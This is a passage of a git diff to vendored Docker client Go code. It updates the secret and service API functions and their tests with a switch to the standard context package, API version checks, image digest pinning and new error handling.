diff --git a/vendor/github.com/docker/docker/client/secret_remove_test.go b/vendor/github.com/docker/docker/client/secret_remove_test.go
index f269f787d2..bdfccf6be8 100644
--- a/vendor/github.com/docker/docker/client/secret_remove_test.go
+++ b/vendor/github.com/docker/docker/client/secret_remove_test.go
@@ -1,19 +1,31 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
+func TestSecretRemoveUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.24",
+		client:  &http.Client{},
+	}
+	err := client.SecretRemove(context.Background(), "secret_id")
+	assert.Check(t, is.Error(err, `"secret remove" requires API version 1.25, but the Docker daemon API version is 1.24`))
+}
+
 func TestSecretRemoveError(t *testing.T) {
 	client := &Client{
-		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
 	err := client.SecretRemove(context.Background(), "secret_id")
@@ -23,9 +35,10 @@ func TestSecretRemoveError(t *testing.T) {
 }
 
 func TestSecretRemove(t *testing.T) {
-	expectedURL := "/secrets/secret_id"
+	expectedURL := "/v1.25/secrets/secret_id"
 
 	client := &Client{
+		version: "1.25",
 		client: newMockClient(func(req *http.Request) (*http.Response, error) {
 			if !strings.HasPrefix(req.URL.Path, expectedURL) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
diff --git a/vendor/github.com/docker/docker/client/secret_update.go b/vendor/github.com/docker/docker/client/secret_update.go
index b94e24aab0..164256bbc1 100644
--- a/vendor/github.com/docker/docker/client/secret_update.go
+++ b/vendor/github.com/docker/docker/client/secret_update.go
@@ -1,16 +1,18 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 	"strconv"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
-// SecretUpdate updates a Secret. Currently, the only part of a secret spec
-// which can be updated is Labels.
+// SecretUpdate attempts to update a Secret
 func (cli *Client) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error {
+	if err := cli.NewVersionError("1.25", "secret update"); err != nil {
+		return err
+	}
 	query := url.Values{}
 	query.Set("version", strconv.FormatUint(version.Index, 10))
 	resp, err := cli.post(ctx, "/secrets/"+id+"/update", query, secret, nil)
diff --git a/vendor/github.com/docker/docker/client/secret_update_test.go b/vendor/github.com/docker/docker/client/secret_update_test.go
index c620985bd5..c7670b440c 100644
--- a/vendor/github.com/docker/docker/client/secret_update_test.go
+++ b/vendor/github.com/docker/docker/client/secret_update_test.go
@@ -1,21 +1,32 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types/swarm"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
+func TestSecretUpdateUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.24",
+		client:  &http.Client{},
+	}
+	err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{})
+	assert.Check(t, is.Error(err, `"secret update" requires API version 1.25, but the Docker daemon API version is 1.24`))
+}
+
 func TestSecretUpdateError(t *testing.T) {
 	client := &Client{
-		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
 	err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{})
@@ -25,9 +36,10 @@ func TestSecretUpdateError(t *testing.T) {
 }
 
 func TestSecretUpdate(t *testing.T) {
-	expectedURL := "/secrets/secret_id/update"
+	expectedURL := "/v1.25/secrets/secret_id/update"
 
 	client := &Client{
+		version: "1.25",
 		client: newMockClient(func(req *http.Request) (*http.Response, error) {
 			if !strings.HasPrefix(req.URL.Path, expectedURL) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
diff --git a/vendor/github.com/docker/docker/client/service_create.go b/vendor/github.com/docker/docker/client/service_create.go
index 3d1be225bd..8fadda4a90 100644
--- a/vendor/github.com/docker/docker/client/service_create.go
+++ b/vendor/github.com/docker/docker/client/service_create.go
@@ -1,23 +1,75 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
+	"fmt"
+	"strings"
 
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
 )
 
 // ServiceCreate creates a new Service.
 func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) {
-	var headers map[string][]string
+	var distErr error
+
+	headers := map[string][]string{
+		"version": {cli.version},
+	}
 
 	if options.EncodedRegistryAuth != "" {
-		headers = map[string][]string{
-			"X-Registry-Auth": {options.EncodedRegistryAuth},
+		headers["X-Registry-Auth"] = []string{options.EncodedRegistryAuth}
+	}
+
+	// Make sure containerSpec is not nil when no runtime is set or the runtime is set to container
+	if service.TaskTemplate.ContainerSpec == nil && (service.TaskTemplate.Runtime == "" || service.TaskTemplate.Runtime == swarm.RuntimeContainer) {
+		service.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{}
+	}
+
+	if err := validateServiceSpec(service); err != nil {
+		return types.ServiceCreateResponse{}, err
+	}
+
+	// ensure that the image is tagged
+	var imgPlatforms []swarm.Platform
+	if service.TaskTemplate.ContainerSpec != nil {
+		if taggedImg := imageWithTagString(service.TaskTemplate.ContainerSpec.Image); taggedImg != "" {
+			service.TaskTemplate.ContainerSpec.Image = taggedImg
+		}
+		if options.QueryRegistry {
+			var img string
+			img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.ContainerSpec.Image, options.EncodedRegistryAuth)
+			if img != "" {
+				service.TaskTemplate.ContainerSpec.Image = img
+			}
 		}
 	}
 
+	// ensure that the image is tagged
+	if service.TaskTemplate.PluginSpec != nil {
+		if taggedImg := imageWithTagString(service.TaskTemplate.PluginSpec.Remote); taggedImg != "" {
+			service.TaskTemplate.PluginSpec.Remote = taggedImg
+		}
+		if options.QueryRegistry {
+			var img string
+			img, imgPlatforms, distErr = imageDigestAndPlatforms(ctx, cli, service.TaskTemplate.PluginSpec.Remote, options.EncodedRegistryAuth)
+			if img != "" {
+				service.TaskTemplate.PluginSpec.Remote = img
+			}
+		}
+	}
+
+	if service.TaskTemplate.Placement == nil && len(imgPlatforms) > 0 {
+		service.TaskTemplate.Placement = &swarm.Placement{}
+	}
+	if len(imgPlatforms) > 0 {
+		service.TaskTemplate.Placement.Platforms = imgPlatforms
+	}
+
 	var response types.ServiceCreateResponse
 	resp, err := cli.post(ctx, "/services/create", nil, service, headers)
 	if err != nil {
@@ -25,6 +77,90 @@ func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec,
 	}
 
 	err = json.NewDecoder(resp.body).Decode(&response)
+
+	if distErr != nil {
+		response.Warnings = append(response.Warnings, digestWarning(service.TaskTemplate.ContainerSpec.Image))
+	}
+
 	ensureReaderClosed(resp)
 	return response, err
 }
+
+func imageDigestAndPlatforms(ctx context.Context, cli DistributionAPIClient, image, encodedAuth string) (string, []swarm.Platform, error) {
+	distributionInspect, err := cli.DistributionInspect(ctx, image, encodedAuth)
+	var platforms []swarm.Platform
+	if err != nil {
+		return "", nil, err
+	}
+
+	imageWithDigest := imageWithDigestString(image, distributionInspect.Descriptor.Digest)
+
+	if len(distributionInspect.Platforms) > 0 {
+		platforms = make([]swarm.Platform, 0, len(distributionInspect.Platforms))
+		for _, p := range distributionInspect.Platforms {
+			// clear architecture field for arm. This is a temporary patch to address
+			// https://github.com/docker/swarmkit/issues/2294. The issue is that while
+			// image manifests report "arm" as the architecture, the node reports
+			// something like "armv7l" (includes the variant), which causes arm images
+			// to stop working with swarm mode. This patch removes the architecture
+			// constraint for arm images to ensure tasks get scheduled.
+			arch := p.Architecture
+			if strings.ToLower(arch) == "arm" {
+				arch = ""
+			}
+			platforms = append(platforms, swarm.Platform{
+				Architecture: arch,
+				OS:           p.OS,
+			})
+		}
+	}
+	return imageWithDigest, platforms, err
+}
+
+// imageWithDigestString takes an image string and a digest, and updates
+// the image string if it didn't originally contain a digest. It returns
+// an empty string if there are no updates.
+func imageWithDigestString(image string, dgst digest.Digest) string {
+	namedRef, err := reference.ParseNormalizedNamed(image)
+	if err == nil {
+		if _, isCanonical := namedRef.(reference.Canonical); !isCanonical {
+			// ensure that image gets a default tag if none is provided
+			img, err := reference.WithDigest(namedRef, dgst)
+			if err == nil {
+				return reference.FamiliarString(img)
+			}
+		}
+	}
+	return ""
+}
+
+// imageWithTagString takes an image string, and returns a tagged image
+// string, adding a 'latest' tag if one was not provided. It returns an
+// empty string if a canonical reference was provided
+func imageWithTagString(image string) string {
+	namedRef, err := reference.ParseNormalizedNamed(image)
+	if err == nil {
+		return reference.FamiliarString(reference.TagNameOnly(namedRef))
+	}
+	return ""
+}
+
+// digestWarning constructs a formatted warning string using the
+// image name that could not be pinned by digest. The formatting
+// is hardcoded, but could me made smarter in the future
+func digestWarning(image string) string {
+	return fmt.Sprintf("image %s could not be accessed on a registry to record\nits digest. Each node will access %s independently,\npossibly leading to different nodes running different\nversions of the image.\n", image, image)
+}
+
+func validateServiceSpec(s swarm.ServiceSpec) error {
+	if s.TaskTemplate.ContainerSpec != nil && s.TaskTemplate.PluginSpec != nil {
+		return errors.New("must not specify both a container spec and a plugin spec in the task template")
+	}
+	if s.TaskTemplate.PluginSpec != nil && s.TaskTemplate.Runtime != swarm.RuntimePlugin {
+		return errors.New("mismatched runtime with plugin spec")
+	}
+	if s.TaskTemplate.ContainerSpec != nil && (s.TaskTemplate.Runtime != "" && s.TaskTemplate.Runtime != swarm.RuntimeContainer) {
+		return errors.New("mismatched runtime with container spec")
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/client/service_create_test.go b/vendor/github.com/docker/docker/client/service_create_test.go
index 1e07382870..9f51c18223 100644
--- a/vendor/github.com/docker/docker/client/service_create_test.go
+++ b/vendor/github.com/docker/docker/client/service_create_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,8 +11,12 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"github.com/opencontainers/go-digest"
+	"github.com/opencontainers/image-spec/specs-go/v1"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestServiceCreateError(t *testing.T) {
@@ -55,3 +60,152 @@ func TestServiceCreate(t *testing.T) {
 		t.Fatalf("expected `service_id`, got %s", r.ID)
 	}
 }
+
+func TestServiceCreateCompatiblePlatforms(t *testing.T) {
+	client := &Client{
+		version: "1.30",
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if strings.HasPrefix(req.URL.Path, "/v1.30/services/create") {
+				var serviceSpec swarm.ServiceSpec
+
+				// check if the /distribution endpoint returned correct output
+				err := json.NewDecoder(req.Body).Decode(&serviceSpec)
+				if err != nil {
+					return nil, err
+				}
+
+				assert.Check(t, is.Equal("foobar:1.0@sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96", serviceSpec.TaskTemplate.ContainerSpec.Image))
+				assert.Check(t, is.Len(serviceSpec.TaskTemplate.Placement.Platforms, 1))
+
+				p := serviceSpec.TaskTemplate.Placement.Platforms[0]
+				b, err := json.Marshal(types.ServiceCreateResponse{
+					ID: "service_" + p.OS + "_" + p.Architecture,
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(b)),
+				}, nil
+			} else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/") {
+				b, err := json.Marshal(registrytypes.DistributionInspect{
+					Descriptor: v1.Descriptor{
+						Digest: "sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96",
+					},
+					Platforms: []v1.Platform{
+						{
+							Architecture: "amd64",
+							OS:           "linux",
+						},
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(b)),
+				}, nil
+			} else {
+				return nil, fmt.Errorf("unexpected URL '%s'", req.URL.Path)
+			}
+		}),
+	}
+
+	spec := swarm.ServiceSpec{TaskTemplate: swarm.TaskSpec{ContainerSpec: &swarm.ContainerSpec{Image: "foobar:1.0"}}}
+
+	r, err := client.ServiceCreate(context.Background(), spec, types.ServiceCreateOptions{QueryRegistry: true})
+	assert.Check(t, err)
+	assert.Check(t, is.Equal("service_linux_amd64", r.ID))
+}
+
+func TestServiceCreateDigestPinning(t *testing.T) {
+	dgst := "sha256:c0537ff6a5218ef531ece93d4984efc99bbf3f7497c0a7726c88e2bb7584dc96"
+	dgstAlt := "sha256:37ffbf3f7497c07584dc9637ffbf3f7497c0758c0537ffbf3f7497c0c88e2bb7"
+	serviceCreateImage := ""
+	pinByDigestTests := []struct {
+		img      string // input image provided by the user
+		expected string // expected image after digest pinning
+	}{
+		// default registry returns familiar string
+		{"docker.io/library/alpine", "alpine:latest@" + dgst},
+		// provided tag is preserved and digest added
+		{"alpine:edge", "alpine:edge@" + dgst},
+		// image with provided alternative digest remains unchanged
+		{"alpine@" + dgstAlt, "alpine@" + dgstAlt},
+		// image with provided tag and alternative digest remains unchanged
+		{"alpine:edge@" + dgstAlt, "alpine:edge@" + dgstAlt},
+		// image on alternative registry does not result in familiar string
+		{"alternate.registry/library/alpine", "alternate.registry/library/alpine:latest@" + dgst},
+		// unresolvable image does not get a digest
+		{"cannotresolve", "cannotresolve:latest"},
+	}
+
+	client := &Client{
+		version: "1.30",
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if strings.HasPrefix(req.URL.Path, "/v1.30/services/create") {
+				// reset and set image received by the service create endpoint
+				serviceCreateImage = ""
+				var service swarm.ServiceSpec
+				if err := json.NewDecoder(req.Body).Decode(&service); err != nil {
+					return nil, fmt.Errorf("could not parse service create request")
+				}
+				serviceCreateImage = service.TaskTemplate.ContainerSpec.Image
+
+				b, err := json.Marshal(types.ServiceCreateResponse{
+					ID: "service_id",
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(b)),
+				}, nil
+			} else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/cannotresolve") {
+				// unresolvable image
+				return nil, fmt.Errorf("cannot resolve image")
+			} else if strings.HasPrefix(req.URL.Path, "/v1.30/distribution/") {
+				// resolvable images
+				b, err := json.Marshal(registrytypes.DistributionInspect{
+					Descriptor: v1.Descriptor{
+						Digest: digest.Digest(dgst),
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(b)),
+				}, nil
+			}
+			return nil, fmt.Errorf("unexpected URL '%s'", req.URL.Path)
+		}),
+	}
+
+	// run pin by digest tests
+	for _, p := range pinByDigestTests {
+		r, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{
+			TaskTemplate: swarm.TaskSpec{
+				ContainerSpec: &swarm.ContainerSpec{
+					Image: p.img,
+				},
+			},
+		}, types.ServiceCreateOptions{QueryRegistry: true})
+
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		if r.ID != "service_id" {
+			t.Fatalf("expected `service_id`, got %s", r.ID)
+		}
+
+		if p.expected != serviceCreateImage {
+			t.Fatalf("expected image %s, got %s", p.expected, serviceCreateImage)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/service_inspect.go b/vendor/github.com/docker/docker/client/service_inspect.go
index ca71cbde1a..de6aa22de7 100644
--- a/vendor/github.com/docker/docker/client/service_inspect.go
+++ b/vendor/github.com/docker/docker/client/service_inspect.go
@@ -1,23 +1,27 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
+	"fmt"
 	"io/ioutil"
-	"net/http"
+	"net/url"
 
+	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // ServiceInspectWithRaw returns the service information and the raw data.
-func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) {
-	serverResp, err := cli.get(ctx, "/services/"+serviceID, nil, nil)
+func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string, opts types.ServiceInspectOptions) (swarm.Service, []byte, error) {
+	if serviceID == "" {
+		return swarm.Service{}, nil, objectNotFoundError{object: "service", id: serviceID}
+	}
+	query := url.Values{}
+	query.Set("insertDefaults", fmt.Sprintf("%v", opts.InsertDefaults))
+	serverResp, err := cli.get(ctx, "/services/"+serviceID, query, nil)
 	if err != nil {
-		if serverResp.statusCode == http.StatusNotFound {
-			return swarm.Service{}, nil, serviceNotFoundError{serviceID}
-		}
-		return swarm.Service{}, nil, err
+		return swarm.Service{}, nil, wrapResponseError(err, serverResp, "service", serviceID)
 	}
 	defer ensureReaderClosed(serverResp)
 
diff --git a/vendor/github.com/docker/docker/client/service_inspect_test.go b/vendor/github.com/docker/docker/client/service_inspect_test.go
index e235cf0fef..b69332ccc6 100644
--- a/vendor/github.com/docker/docker/client/service_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/service_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -9,8 +10,9 @@ import (
 	"strings"
 	"testing"
 
+	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
 func TestServiceInspectError(t *testing.T) {
@@ -18,7 +20,7 @@ func TestServiceInspectError(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
-	_, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing")
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing", types.ServiceInspectOptions{})
 	if err == nil || err.Error() != "Error response from daemon: Server error" {
 		t.Fatalf("expected a Server Error, got %v", err)
 	}
@@ -29,9 +31,21 @@ func TestServiceInspectServiceNotFound(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
 	}
 
-	_, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown")
-	if err == nil || !IsErrServiceNotFound(err) {
-		t.Fatalf("expected an serviceNotFoundError error, got %v", err)
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown", types.ServiceInspectOptions{})
+	if err == nil || !IsErrNotFound(err) {
+		t.Fatalf("expected a serviceNotFoundError error, got %v", err)
+	}
+}
+
+func TestServiceInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), "", types.ServiceInspectOptions{})
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
 	}
 }
 
@@ -55,7 +69,7 @@ func TestServiceInspect(t *testing.T) {
 		}),
 	}
 
-	serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id")
+	serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id", types.ServiceInspectOptions{})
 	if err != nil {
 		t.Fatal(err)
 	}
diff --git a/vendor/github.com/docker/docker/client/service_list.go b/vendor/github.com/docker/docker/client/service_list.go
index c29e6d407d..7d53e2b9b9 100644
--- a/vendor/github.com/docker/docker/client/service_list.go
+++ b/vendor/github.com/docker/docker/client/service_list.go
@@ -1,13 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // ServiceList returns the list of services.
@@ -15,7 +15,7 @@ func (cli *Client) ServiceList(ctx context.Context, options types.ServiceListOpt
 	query := url.Values{}
 
 	if options.Filters.Len() > 0 {
-		filterJSON, err := filters.ToParam(options.Filters)
+		filterJSON, err := filters.ToJSON(options.Filters)
 		if err != nil {
 			return nil, err
 		}
diff --git a/vendor/github.com/docker/docker/client/service_list_test.go b/vendor/github.com/docker/docker/client/service_list_test.go
index 213981ef70..9903f9e71c 100644
--- a/vendor/github.com/docker/docker/client/service_list_test.go
+++ b/vendor/github.com/docker/docker/client/service_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -12,7 +13,6 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 func TestServiceListError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/service_logs.go b/vendor/github.com/docker/docker/client/service_logs.go
index 24384e3ec0..906fd4059e 100644
--- a/vendor/github.com/docker/docker/client/service_logs.go
+++ b/vendor/github.com/docker/docker/client/service_logs.go
@@ -1,14 +1,14 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
 	"net/url"
 	"time"
 
-	"golang.org/x/net/context"
-
 	"github.com/docker/docker/api/types"
 	timetypes "github.com/docker/docker/api/types/time"
+	"github.com/pkg/errors"
 )
 
 // ServiceLogs returns the logs generated by a service in an io.ReadCloser.
@@ -26,7 +26,7 @@ func (cli *Client) ServiceLogs(ctx context.Context, serviceID string, options ty
 	if options.Since != "" {
 		ts, err := timetypes.GetTimestamp(options.Since, time.Now())
 		if err != nil {
-			return nil, err
+			return nil, errors.Wrap(err, `invalid value for "since"`)
 		}
 		query.Set("since", ts)
 	}
diff --git a/vendor/github.com/docker/docker/client/service_logs_test.go b/vendor/github.com/docker/docker/client/service_logs_test.go
index a6d002ba75..28f3ab5c6b 100644
--- a/vendor/github.com/docker/docker/client/service_logs_test.go
+++ b/vendor/github.com/docker/docker/client/service_logs_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io"
 	"io/ioutil"
@@ -13,8 +14,8 @@ import (
 	"time"
 
 	"github.com/docker/docker/api/types"
-
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestServiceLogsError(t *testing.T) {
@@ -22,15 +23,11 @@ func TestServiceLogsError(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 	_, err := client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{})
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
-	}
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
 	_, err = client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{
 		Since: "2006-01-02TZ",
 	})
-	if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) {
-		t.Fatalf("expected a 'parsing time' error, got %v", err)
-	}
+	assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`))
 }
 
 func TestServiceLogs(t *testing.T) {
@@ -38,6 +35,7 @@ func TestServiceLogs(t *testing.T) {
 	cases := []struct {
 		options             types.ContainerLogsOptions
 		expectedQueryParams map[string]string
+		expectedError       string
 	}{
 		{
 			expectedQueryParams: map[string]string{
@@ -71,21 +69,27 @@ func TestServiceLogs(t *testing.T) {
 		},
 		{
 			options: types.ContainerLogsOptions{
-				// An complete invalid date, timestamp or go duration will be
-				// passed as is
-				Since: "invalid but valid",
+				// timestamp will be passed as is
+				Since: "1136073600.000000001",
 			},
 			expectedQueryParams: map[string]string{
 				"tail":  "",
-				"since": "invalid but valid",
+				"since": "1136073600.000000001",
 			},
 		},
+		{
+			options: types.ContainerLogsOptions{
+				// An complete invalid date will not be passed
+				Since: "invalid value",
+			},
+			expectedError: `invalid value for "since": failed to parse value as time or duration: "invalid value"`,
+		},
 	}
 	for _, logCase := range cases {
 		client := &Client{
 			client: newMockClient(func(r *http.Request) (*http.Response, error) {
 				if !strings.HasPrefix(r.URL.Path, expectedURL) {
-					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+					return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, r.URL)
 				}
 				// Check query parameters
 				query := r.URL.Query()
@@ -102,17 +106,15 @@ func TestServiceLogs(t *testing.T) {
 			}),
 		}
 		body, err := client.ServiceLogs(context.Background(), "service_id", logCase.options)
-		if err != nil {
-			t.Fatal(err)
+		if logCase.expectedError != "" {
+			assert.Check(t, is.Error(err, logCase.expectedError))
+			continue
 		}
+		assert.NilError(t, err)
 		defer body.Close()
 		content, err := ioutil.ReadAll(body)
-		if err != nil {
-			t.Fatal(err)
-		}
-		if string(content) != "response" {
-			t.Fatalf("expected response to contain 'response', got %s", string(content))
-		}
+		assert.NilError(t, err)
+		assert.Check(t, is.Contains(string(content), "response"))
 	}
 }
 
diff --git a/vendor/github.com/docker/docker/client/service_remove.go b/vendor/github.com/docker/docker/client/service_remove.go
index a9331f92c2..fe3421bec8 100644
--- a/vendor/github.com/docker/docker/client/service_remove.go
+++ b/vendor/github.com/docker/docker/client/service_remove.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
-import "golang.org/x/net/context"
+import "context"
 
 // ServiceRemove kills and removes a service.
 func (cli *Client) ServiceRemove(ctx context.Context, serviceID string) error {
 	resp, err := cli.delete(ctx, "/services/"+serviceID, nil, nil)
 	ensureReaderClosed(resp)
-	return err
+	return wrapResponseError(err, resp, "service", serviceID)
 }
diff --git a/vendor/github.com/docker/docker/client/service_remove_test.go b/vendor/github.com/docker/docker/client/service_remove_test.go
index 8e2ac259c1..d2379a1366 100644
--- a/vendor/github.com/docker/docker/client/service_remove_test.go
+++ b/vendor/github.com/docker/docker/client/service_remove_test.go
@@ -1,14 +1,16 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
 
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestServiceRemoveError(t *testing.T) {
@@ -17,9 +19,17 @@ func TestServiceRemoveError(t *testing.T) {
 	}
 
 	err := client.ServiceRemove(context.Background(), "service_id")
-	if err == nil || err.Error() != "Error response from daemon: Server error" {
-		t.Fatalf("expected a Server Error, got %v", err)
+	assert.Check(t, is.Error(err, "Error response from daemon: Server error"))
+}
+
+func TestServiceRemoveNotFoundError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "missing")),
 	}
+
+	err := client.ServiceRemove(context.Background(), "service_id")
+	assert.Check(t, is.Error(err, "Error: No such service: service_id"))
+	assert.Check(t, IsErrNotFound(err))
 }
 
 func TestServiceRemove(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/service_update.go b/vendor/github.com/docker/docker/client/service_update.go
index afa94d47e2..5a7a61b01f 100644
--- a/vendor/github.com/docker/docker/client/service_update.go
+++ b/vendor/github.com/docker/docker/client/service_update.go
@@ -1,34 +1,80 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 	"strconv"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // ServiceUpdate updates a Service.
 func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) {
 	var (
-		headers map[string][]string
 		query   = url.Values{}
+		distErr error
 	)
 
+	headers := map[string][]string{
+		"version": {cli.version},
+	}
+
 	if options.EncodedRegistryAuth != "" {
-		headers = map[string][]string{
-			"X-Registry-Auth": {options.EncodedRegistryAuth},
-		}
+		headers["X-Registry-Auth"] = []string{options.EncodedRegistryAuth}
 	}
 
 	if options.RegistryAuthFrom != "" {
 		query.Set("registryAuthFrom", options.RegistryAuthFrom)
 	}
 
+	if options.Rollback != "" {
+		query.Set("rollback", options.Rollback)
+	}
+
 	query.Set("version", strconv.FormatUint(version.Index, 10))
 
+	if err := validateServiceSpec(service); err != nil {
+		return types.ServiceUpdateResponse{}, err
+	}
+
+	var imgPlatforms []swarm.Platform
+	// ensure that the image is tagged
+	if service.TaskTemplate.ContainerSpec != nil {
+		if taggedImg := imageWithTagString(service.TaskTemplate.ContainerSpec.Image); taggedImg != "" {
+			service.TaskTemplate.ContainerSpec.Image = taggedImg
+		}
